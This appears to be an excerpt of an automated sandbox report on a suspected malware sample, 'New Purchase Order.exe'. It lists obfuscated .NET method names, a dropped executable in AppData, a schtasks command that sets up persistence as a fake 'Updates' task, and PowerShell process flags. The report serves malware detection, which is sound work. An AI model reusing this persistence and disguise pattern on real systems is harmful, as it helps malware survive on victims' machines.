            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, r6uWPH54nyDsQ5R73a.cs High entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs High entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.cs High entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, raAPqr4eix1YefVSjY.cs High entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, ArHCtDC5S2Y8AYEOBV.cs High entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, EQ0ZWrk6M5lhuWnFO8.cs High entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, T0eQ8UBALokRnXqfN7.cs High entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, HHhsU2qAYMPla5aIDYc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, q3VKdmLQewPeuA4N72.cs High entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, ckj7u2pGAaf8INieFh.cs High entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, JwTBk9IPoaxFjSc6xW.cs High entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SRCqlIJcgwJZFuosxj.cs High entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, VgQkbRn23bHy4GHxvj.cs High entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, OEhUlQ281Owx1tmo6p.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, OYyLu3T6BDUCTl9P9j.cs High entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SWK57FcddZRYqoRlo9.cs High entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, IWOHEthbFFReLStnZY.cs High entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, x9Oa4nuLVFFG6CaiRN.cs High entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, nLS36HZfw7qLEHMs2t.cs High entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, DwiqYnyOeNkuOV9dDN.cs High entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, r6uWPH54nyDsQ5R73a.cs High entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs High entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.cs High entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, raAPqr4eix1YefVSjY.cs High entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, ArHCtDC5S2Y8AYEOBV.cs High entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, EQ0ZWrk6M5lhuWnFO8.cs High entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, T0eQ8UBALokRnXqfN7.cs High entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, HHhsU2qAYMPla5aIDYc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, q3VKdmLQewPeuA4N72.csHigh entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, ckj7u2pGAaf8INieFh.csHigh entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, JwTBk9IPoaxFjSc6xW.csHigh entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SRCqlIJcgwJZFuosxj.csHigh entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, VgQkbRn23bHy4GHxvj.csHigh entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, OEhUlQ281Owx1tmo6p.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, OYyLu3T6BDUCTl9P9j.csHigh entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, SWK57FcddZRYqoRlo9.csHigh entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, IWOHEthbFFReLStnZY.csHigh entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, x9Oa4nuLVFFG6CaiRN.csHigh entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, nLS36HZfw7qLEHMs2t.csHigh entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, DwiqYnyOeNkuOV9dDN.csHigh entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, r6uWPH54nyDsQ5R73a.csHigh entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.csHigh entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.csHigh entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, raAPqr4eix1YefVSjY.csHigh entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, ArHCtDC5S2Y8AYEOBV.csHigh entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, EQ0ZWrk6M5lhuWnFO8.csHigh entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, T0eQ8UBALokRnXqfN7.csHigh entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: C:\Users\user\Desktop\New Purchase Order.exe  File created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe

            Boot Survival

            Source: C:\Users\user\Desktop\New Purchase Order.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\New Purchase Order.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setupugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: New Purchase Order.exe PID: 4988, type: MEMORYSTR
